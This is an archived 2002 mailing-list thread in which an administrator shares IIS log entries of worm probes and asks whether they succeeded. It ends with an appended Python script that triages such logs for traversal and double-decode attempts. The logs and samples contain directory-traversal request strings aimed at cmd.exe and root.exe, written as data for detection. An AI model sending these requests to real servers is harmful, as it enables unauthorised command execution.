That was my worry also. Especially the "%5c" in the
Double Decode (Unicode leaves a .../... footprint
doesn't it?). Although the server is issuing 400
level error codes for *all* the attacks. Also I can
find no abnormal processes running or ports open 
(using fport). The machine is current on all security
patches (all patches period for that matter, I'm paranoid).

Jim Grossl
Lee Pesky Learning Center
Boise, Idaho USA 

-----Original Message-----
From: Andrew Blevins [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, January 16, 2002 11:14 AM
To: Jim Grossl
Subject: RE: IIS log files, can I have your take on these attacks?


It looks to me like Unicode has already happened here. Am I right anyone? Or
way off?

Blevins


-----Original Message-----
From: Jim Grossl [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, January 15, 2002 8:24 AM
To: [EMAIL PROTECTED]
Subject: IIS log files, can I have your take on these attacks?

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] 
  "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837

207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] 
  "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
It kind of bothers me to post these on an open list (apparently
our Web server doesn't need any more "attention") but
I would like to know what everyone thinks of these attacks. My
Web server logged > 2000 of these attacks over the weekend. I'm
pretty sure that the attacks are not succeeding, but I've read that
if the "%5c" shows up in the Double Decode attack then the file
traversal is taking place. Thanks.

Jim Grossl
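To check the question raised in this thread mechanically rather than by eye, here is an added example (not code from any of the posters) that parses log lines in the quoted shape, decodes the request path twice the way the IIS double-decode bug did, flags traversal and shell-name indicators, and separates requests the server refused (4xx) from ones it actually served (2xx). All sample lines are constructed; the 198.51.100.7 entry returning 200 is invented to show the case that would warrant a closer look, and the verdict names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines, modelled on the ones quoted in the post
# (each joined onto one line; the mailer wrapped the originals).
SAMPLE_LOG = """\
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837
207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
198.51.100.7 - - [14/Jan/2002:10:31:00 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1021
10.0.0.5 - - [14/Jan/2002:10:31:05 -0700] "GET /index.htm HTTP/1.0" 200 1234
"""

# NCSA-style line: client, anything up to [time], "method path proto", status, bytes.
# "[^\[]*" tolerates both the "--" and the "- -" ident/user spellings seen above.
LINE_RE = re.compile(r'^(\S+) [^\[]*\[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

def decode_twice(path: str) -> str:
    """Percent-decode, then decode again, as the IIS double-decode bug did:
    %255c -> %5c -> backslash. A single decode would miss that second step."""
    return unquote(unquote(path))

def classify(line: str):
    """Return (client_ip, status, indicators, verdict) or None if unparseable.
    The verdict is a triage hint: 'refused' means the server answered 4xx/5xx
    at the URL stage; 'review' means a traversal-shaped request got a 2xx and
    the served content should be checked; 'benign' means no indicator fired."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, raw_path, status, _size = m.groups()
    once = unquote(raw_path)
    path = unquote(once).lower()
    indicators = []
    if re.search(r'\.\.[\\/]', path):          # ..\ or ../ visible after decoding
        indicators.append('traversal')
    if 'cmd.exe' in path or 'root.exe' in path:
        indicators.append('shell')
    if once != raw_path:                       # any %-escape in the request
        indicators.append('encoded')
    if unquote(once) != once:                  # escape that only yields on 2nd pass
        indicators.append('double-encoded')
    if not indicators:
        verdict = 'benign'
    elif status.startswith('2'):
        verdict = 'review'
    else:
        verdict = 'refused'
    return ip, status, indicators, verdict

def summarize(log_text: str) -> dict:
    """Count verdicts over a whole log; a non-zero 'review' count is the signal
    that matters, regardless of how many probes were refused."""
    counts = {}
    for r in (classify(l) for l in log_text.splitlines()):
        if r:
            counts[r[3]] = counts.get(r[3], 0) + 1
    return counts
```

Run it on a real IIS log converted to this format and look only at the 'review' rows; the thousands of 404/401 probes tell you the worm is scanning, not that it got in.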
